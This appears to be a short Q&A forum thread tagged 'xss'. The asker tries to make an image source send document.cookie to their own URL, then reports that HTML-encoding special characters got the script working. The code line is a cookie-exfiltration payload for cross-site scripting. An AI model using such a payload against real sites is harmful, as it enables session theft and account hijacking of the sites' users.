# concantenate url string and variable javascript

Tags: javascript, variables, url, concatenation, xss

I have a url, and I'm trying to add the cookie value to the url, but I can't seem to make it work.

```
img.src = "http://thisismyurl/?cookie=" + document.cookie
```

Any ideas how to add the url and the variable together?

Comment: What is the result that you're getting? I'm not able to duplicate any issue.

Comment: Are you sure `document.cookie` is defined and trying to read it isn't throwing an error?

Comment: I figured out that it wasn't the code that was wrong, it was the way html handled the script. I had to replace the special characters with the encoding, even the plus sign. thanks for the help!